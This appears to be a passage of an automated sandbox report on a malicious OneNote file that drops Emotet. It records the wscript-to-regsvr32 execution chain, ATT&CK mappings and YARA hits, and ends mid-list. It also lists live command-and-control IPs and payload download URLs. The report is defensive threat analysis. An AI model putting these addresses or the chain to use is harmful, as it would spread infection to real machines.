                  Source: wscript.exe, 0000000A.00000003.375930591.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.395053887.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393332313.0000000005A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MTGestures.dllAFxNCNDhpJUjLGSUBdyJAlirWAPgLpQbnGOFgAaVQghYMoDvlcIkoDhwOzmAbGiqsZapYXQEJBQNrWjAcIMOdUMWKfNaHjlQaJhaKDTvvAjmdNJiPaRsRtAqadcjQnlCAvvAmhroJJBvgsvkBdxxRGsBgAFcJiBlIVCeEMUhTYUniUkHlJscBBleGyOkIaepldUiBoepXZDDjhOrSbcuQncJBBpzeaEnGaBwCjRpCFIstcxCJsqCnAMpjCNPpdSVcuSzviIZhvCWSTfhZCOOXnQoQSaTGSpWIAaSzoCSUruSgGDFRVUvVHcTuCTCQAClHYzuiPWfwqyQYVCeHgsCxOuoDTDrPCpbkGyHjPVYKKbevwuabtfosDIczDdVVlDDXtcAMkZFBDahoeOjCyDdmfNyLzGBEZdhjuVaLnGLACDllRegisterServerEDirxlezljynQMbEJrkYuGqWKJxcbkEWFxWujEOCBExEDvmpuiTSdISaFTJpbnDERdHSxbrluXBmlgEWqRXzEYZJPwDvIiOCEbquiojgkxAHEjCrzKFSJZHjqXtVCcouBFmgnZSsFwGMzFvmlRhqfdgYjGEakZdngEgkQEMUwGIucseXHMrRrXPFeKwGNoduqRICMxxYLScjzRRGTdkEFQtZIyifVPtMwGUUIOYFVBkCRKKGPMGabGyYGlmIPNFEUxGfzccoGbGvtGqxGeRkjCFWGrnXAGGsRUyGCvRhXYbBNdoXgMoDGyQSbTrVGUQXgOfZOvlwGGJOZHCaLEQxCPhokiggZcHETlXzHRQNzHLCNHYjXYHbOXELXYCISKZiApGwwqfPxyvDEIcSKMpKalYoTBtNCIprhqRmUjfLjdAvaVSyhIsZFDjJYWWGraQqQsCIojuoPIItCdjvWTgdRQjq
                  Source: wscript.exe, 0000000A.00000003.365300906.00000000067D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.363410044.0000000005A73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365708406.00000000067DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391640204.0000000006904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.375930591.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365546187.00000000067D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365393503.0000000006867000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365227368.0000000006860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.395053887.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365163750.00000000067D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393332313.0000000005A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GEakZdngEgkQEMUw
                  Source: wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.00000000053A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380055179.00000000053A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379248511.0000000005397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394303780.00000000053A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002E2B0 memset,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000000018002E2B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00000001800315BC GetProcessHeap,14_2_00000001800315BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0000000180048DE0 LdrFindResource_U,LdrAccessResource,atoi,NtAllocateVirtualMemory,14_2_0000000180048DE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0000000180002108 SetUnhandledExceptionFilter,14_2_0000000180002108
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002E2B0 memset,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000000018002E2B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00000001800019D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00000001800019D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0000000180001F20 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000000180001F20

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 115.178.55.22 80Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 193.194.92.175 443Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 93.84.115.205 7080Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 195.2.88.86 80Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 31.31.196.93 443Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeDomain query: olgaperezporro.com
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 40.115.116.248 443Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 218.38.121.17 443Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeDomain query: malli.su
                  Source: C:\Windows\SysWOW64\wscript.exeDomain query: kts.group
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 138.197.14.67 8080Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,14_2_000000018002C718
                  Source: C:\Windows\System32\regsvr32.exeCode function: TranslateName,TranslateName,IsValidCodePage,wcschr,wcschr,GetLocaleInfoW,14_2_0000000180040750
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,14_2_000000018002C838
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,14_2_000000018002C8A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,14_2_0000000180040A5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,14_2_0000000180040AE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,14_2_0000000180040BB0
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_0000000180040C70
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,14_2_0000000180040EB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_0000000180041000
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,14_2_00000001800410D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_0000000180041210
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,14_2_000000018002D69C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00000001800455F0 cpuid 14_2_00000001800455F0
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018000217C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_2_000000018000217C

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Malicious OneNote
                  Source: Yara matchFile source: malware.one, type: SAMPLE
                  Source: Yara matchFile source: C:\Users\user\Desktop\malware.one, type: DROPPED
                  Yara detected Emotet
                  Source: Yara matchFile source: 0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 15.2.regsvr32.exe.2030000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regsvr32.exe.2030000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.regsvr32.exe.e00000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.regsvr32.exe.e00000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.573776336.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.573888713.0000000002061000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.373814331.0000000000E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Yara detected Malicious OneNote
                  Source: Yara matchFile source: malware.one, type: SAMPLE
                  Source: Yara matchFile source: C:\Users\user\Desktop\malware.one, type: DROPPED

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Scripting                  		2
                  Registry Run Keys / Startup Folder                  		111
                  Process Injection                  		21
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		Exfiltration Over Other Network Medium11
                  Encrypted Channel                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		2
                  Registry Run Keys / Startup Folder                  		1
                  Virtualization/Sandbox Evasion                  		LSASS Memory121
                  Security Software Discovery                  		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                  Non-Standard Port                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)1
                  DLL Side-Loading                  		111
                  Process Injection                  		Security Account Manager1
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                  Ingress Tool Transfer                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Deobfuscate/Decode Files or Information                  		NTDS2
                  Process Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Non-Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Scripting                  		LSA Secrets1
                  Remote System Discovery                  		SSHKeyloggingData Transfer Size Limits113
                  Application Layer Protocol                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  Hidden Files and Directories                  		Cached Domain Credentials2
                  File and Directory Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items2
                  Obfuscated Files or Information                  		DCSync35
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  Regsvr32                  		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                  DLL Side-Loading                  		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830538 Sample: malware.malware Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 40 103.224.241.74 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 2->40 42 85.214.67.203 STRATOSTRATOAGDE Germany 2->42 44 33 other IPs or domains 2->44 60 Snort IDS alert for network traffic 2->60 62 Antivirus detection for URL or domain 2->62 64 Multi AV Scanner detection for dropped file 2->64 66 6 other signatures 2->66 10 ONENOTE.EXE 50 501 2->10         started        13 ONENOTEM.EXE 2->13         started        signatures3 process4 file5 38 C:\Users\user\Desktop\malware.one, data 10->38 dropped 15 wscript.exe 3 10->15         started        20 ONENOTEM.EXE 1 10->20         started        process6 dnsIp7 52 malli.su 195.2.88.86, 80 ZENON-ASMoscowRussiaRU Russian Federation 15->52 54 olgaperezporro.com 40.115.116.248, 443, 49703 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 15->54 56 kts.group 31.31.196.93, 443, 49702 AS-REGRU Russian Federation 15->56 32 C:\Users\user\AppData\...\rad66B18.tmp.dll, PE32+ 15->32 dropped 34 C:\Users\user\AppData\Local\Temp\click.wsf, ASCII 15->34 dropped 58 System process connects to network (likely due to code injection or exploit) 15->58 22 regsvr32.exe 15->22         started        file8 signatures9 process10 process11 24 regsvr32.exe 2 22->24         started        file12 36 C:\Windows\System32\...\OfEg.dll (copy), PE32+ 24->36 dropped 68 Hides that the sample has been downloaded from the Internet (zone.identifier) 24->68 28 regsvr32.exe 24->28         started        signatures13 process14 dnsIp15 46 218.38.121.17, 443, 49710 SKB-ASSKBroadbandCoLtdKR Korea Republic of 28->46 48 115.178.55.22, 49709, 80 SIMAYA-AS-IDPTSimayaJejaringMandiriID Indonesia 28->48 50 3 other IPs or domains 28->50 70 System process connects to network (likely due to code injection or exploit) 28->70 signatures16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  malware.one29%ReversingLabsWin32.Trojan.Woreflint

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll79%ReversingLabsWin64.Trojan.Emotet
                  C:\Windows\System32\JMgyzwrCUAZpIA\OfEg.dll (copy)79%ReversingLabsWin64.Trojan.Emotet

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  14.2.regsvr32.exe.e00000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                  15.2.regsvr32.exe.2030000.0.unpack100%AviraHEUR/AGEN.1215493Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://115.178.55.22:80/0%URL Reputationsafe
                  https://193.194.92.175/0%Avira URL Cloudsafe
                  https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/rw100%Avira URL Cloudmalware
                  http://uk-eurodom.co0%Avira URL Cloudsafe
                  https://218.38.121.17/tcbvserkm/kigv/rbwmds/100%Avira URL Cloudmalware
                  https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/0100%Avira URL Cloudmalware
                  https://218.38.121.17:443/tcbvserkm/kigv/rbwmds/100%Avira URL Cloudmalware
                  https://138.197.14.67:8080/tcbvserkm/kigv/rbwmds/100%Avira URL Cloudmalware
                  https://218.38.121.17/0%URL Reputationsafe
                  https://218.38.121.17/tcbvserkm/kigv/rbwmds/T(100%Avira URL Cloudmalware
                  https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/6100%Avira URL Cloudmalware
                  https://218.38.121.17/tcbvserkm/kigv/rbwmds/wn100%Avira URL Cloudmalware
                  https://thailandcan.org/assets/ulRa/P100%Avira URL Cloudmalware
                  https://4fly.su:443/search/OfGA/wM100%Avira URL Cloudmalware
                  https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/vM100%Avira URL Cloudmalware
                  https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/100%Avira URL Cloudmalware
                  http://semedacara.com.br/ava/ahhz/100%Avira URL Cloudmalware
                  http://staging-demo.com/public_html/wTG/100%Avira URL Cloudmalware
                  http://malli.su:80/img/PXN5J/100%Avira URL Cloudmalware
                  http://1it.fit0%Avira URL Cloudsafe
                  https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/100%Avira URL Cloudmalware
                  https://93.84.115.205:7080/T100%Avira URL Cloudmalware
                  https://olgaperezporro.com/100%Avira URL Cloudmalware
                  https://115.178.55.22:80/l100%Avira URL Cloudmalware
                  http://www.polarkh-crewing.com/aboutu0%Avira URL Cloudsafe
                  http://efirma.sg0%Avira URL Cloudsafe
                  https://198.38.121.17/0%Avira URL Cloudsafe
                  http://uk-eurodom.com/bitrix/9HrzPY66D1F/100%Avira URL Cloudmalware
                  http://malli.s40%Avira URL Cloudsafe
                  https://olgaperezporro.com100%Avira URL Cloudmalware
                  https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/esqu100%Avira URL Cloudmalware
                  https://138.197.14.67:8080/tcbvserkm/kigv/rbwmds/a100%Avira URL Cloudmalware
                  https://4fly.su:443/search/OfGA/100%Avira URL Cloudmalware
                  http://staging-demo.com/public_html/wTG/xM100%Avira URL Cloudphishing
                  http://semedacara.com.br/ava/ahhz/yM100%Avira URL Cloudmalware
                  https://kts.group/35ccbf2003/jKgk8/uM100%Avira URL Cloudmalware
                  http://1it.fit/site_vp/4PwK3s6Bf9K7TEA/100%Avira URL Cloudmalware
                  http://efirma.sglwebs.com/img/2mmLuv7SxhhYFRVn/8100%Avira URL Cloudmalware
                  https://4fly.su:443/search/OfGA/ata100%Avira URL Cloudmalware
                  https://kts.group100%Avira URL Cloudmalware
                  http://staging-demo.com/public_html/wT100%Avira URL Cloudphishing
                  http://uk-eurodom.com/bitrix/9HrzPY66D1F/24Q100%Avira URL Cloudmalware
                  http://efirma.sglwebs.com/img/2mmLuv0%Avira URL Cloudsafe
                  https://kts.group/35ccbf2003/jKgk8/100%Avira URL Cloudmalware
                  http://semedacara.com.br/ava/a0%Avira URL Cloudsafe
                  https://thailandcan.org/assets/ulRa/100%Avira URL Cloudmalware
                  http://malli.su:80/img/PXN5J/tM100%Avira URL Cloudmalware
                  http://1it.fit/site_vp/4PwK3s6Bf9K7TEA/EC24%100%Avira URL Cloudmalware
                  https://138.197.14.67:8080/100%Avira URL Cloudmalware
                  http://efirma.sglwebs.com/img/2mmLuv7SxhhYFRVn/100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  malli.su
                  		195.2.88.86
                  		truetrue
                    		unknown
                    kts.group
                    		31.31.196.93
                    		truetrue
                      		unknown
                      c-0001.c-msedge.net
                      		13.107.4.50
                      		truefalse
                        		unknown
                        olgaperezporro.com
                        		40.115.116.248
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/true
                          • Avira URL Cloud: malware
                          		unknown
                          https://kts.group/35ccbf2003/jKgk8/true
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://218.38.121.17:443/tcbvserkm/kigv/rbwmds/regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://218.38.121.17/tcbvserkm/kigv/rbwmds/regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.572181479.000000000077A000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://193.194.92.175/regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://uk-eurodom.cowscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/0regsvr32.exe, 0000000F.00000002.572181479.00000000007C3000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://hypernite.5v.pl/vendor/hvlVMsI9jGafBBTa/wscript.exe, wscript.exe, 0000000A.00000002.394746955.00000000058EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.376996553.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://staging-demo.com/public_html/wTG/wscript.exe, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.376996553.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382922576.000000000564F000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/rwregsvr32.exe, 0000000F.00000002.572181479.00000000007C3000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://semedacara.com.br/ava/ahhz/wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382922576.000000000564F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381734544.0000000005502000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391066699.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380726054.0000000005502000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381193898.00000000054BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389552765.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381193898.00000000054D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381071407.0000000005518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391066699.00000000059A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380565209.00000000054D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384344893.000000000569B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380087000.0000000005498000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385194824.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393045342.00000000056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380087000.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381296278.0000000005577000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385805896.000000000575C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.378645005.0000000002DF1000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://malli.su:80/img/PXN5J/wscript.exe, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 